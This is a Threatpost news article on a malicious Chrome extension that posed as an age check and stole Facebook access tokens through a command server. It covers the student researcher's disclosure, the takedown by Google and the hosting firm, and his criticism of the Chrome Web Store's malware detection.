Subscribe to our Threatpost Today newsletter

Join thousands of people who receive the latest breaking cybersecurity news every day.

The administrator of your personal data will be Threatpost, Inc., 500 Unicorn Park, Woburn, MA 01801. Detailed information on the processing of personal data can be found in the privacy policy. In addition, you will find them in the message confirming the subscription to the newsletter.

*

*

I agree to my personal data being stored and used to receive the newsletter

*

I agree to accept information and occasional commercial offers from Threatpost partners

The administrator of your personal data will be Threatpost, Inc., 500 Unicorn Park, Woburn, MA 01801. Detailed information on the processing of personal data can be found in the privacy policy. In addition, you will find them in the message confirming the subscription to the newsletter.

“Intrigued, I decided to go down the rabbit hole and see what this was all about,” wrote Kjaer, a 19-year-old computer science student at Swiss Federal Institute of Technology in Switzerland, in a blog post Monday.

What he found was what he called a “glaring security hole” in the Google Chrome Webstore that allowed malware authors to infect Chrome browsers via a bogus age verification extension.

The malware-laced extension called “Viral Content Age Verify” allowed a third-party to “read and change all your data on the websites you visit” and potentially “read your emails, steal all your login credentials, have you DDoS someone, mine Bitcoin, seed pirated content… You name it. That even includes reading and leaking your credit card information, if you ever are to type that in,” Kjaer describes.

Going down the rabbit hole began with clicking Like on one of his Facebook friend’s “semi-raunchy” Liked item. As soon as he did he was asked to verify his age via by installing the Viral Content Age Verify Chrome browser extension.

By agreeing to install the extension, Kjaer watched as a metadata file called manifest.json began to run through three scripts (background.js, query-string.js and install.js). Both background.js and query-string.js scripts are innocuous. However, the install.js script fetches the malware payload from two hard-coded URLs. “The first URL is to get instructions from a server (C2), and the second one is to report back to it,” he wrote.

Post-script execution, the C2’s instructions were to steal access tokens (the equivalent of having your username and password) for Facebook so the malware authors can control your Facebook account. The first step for malware authors and a hijacked Facebook account was to Like a Facebook page called a page called VVideosss.

While Kjaer said the malware functions that he documented were Facebook specific, he noted that the credential stealing function also applied to YouTube. Once credentials are collected, he observed, the malware sends back to the C2 information identifying the infected machine, what version of the age verification extension you are running and whether or not you are currently logged into Facebook.

All together Kjaer said there were nine identical variations of the Viral Content Age Verify extensions on the Google Chrome Webstore with a cumulative total of 132,265 users. Kjaer notified both Google and the C2 servers’ hosting company, DigitalOcean, of the malware. Both Google and the hosting firm took immediate action, taking down the servers and blacklisting the extensions.

“All the machines technically remain infected, but the malware will be defused. Still, that’s a patched security vulnerability on 130,000 machines at once. A drop in the ocean compared to the size of the Internet, but still a decent catch if you ask me,” Kjaer wrote.

Google did not immediately respond to Threatpost’s request for comment but the company did reply to Kjaer, and confirmed it blacklisted the Age Verification extensions. Will Harris, a member of Chrome’s Security team told Kjaer that when extensions are blacklisted they are also automatically removed from the user’s computers as well.

@maximekjaer Extensions that are blacklisted in the Chrome web store do get automatically removed from all users who have them installed.

Kjaer commended Google’s move but still blasted the company for its approach to Chrome extension security.

“The fact is that the current malware detection on the Chrome Webstore is a joke,” he wrote, “Currently, all it takes to get around it is to download the payload on installation rather than shipping with it. This has been the case for years now, and it doesn’t seem like Google is doing much about it. They offer 5-digit bug bounties for vulnerabilities in Chrome, and yet they leave this glaring security hole virtually unguarded!”

The most serious vulnerabilities in Cisco’s 8800 Series IP Phones could allow unauthenticated, remote attackers to conduct a cross-site request forgery attack or write arbitrary files to the filesystem.

Authors

Threatpost

InfoSec Insider Post

InfoSec Insider content is written by a trusted community of Threatpost cybersecurity subject matter experts. Each contribution has a goal of bringing a unique voice to important cybersecurity topics. Content strives to be of the highest quality, objective and non-commercial.

Sponsored

Sponsored Post

Sponsored Content is paid for by an advertiser. Sponsored content is written and edited by members of our sponsor community. This content creates an opportunity for a sponsor to provide insight and commentary from their point-of-view directly to the Threatpost audience. The Threatpost editorial team does not participate in the writing or editing of Sponsored Content.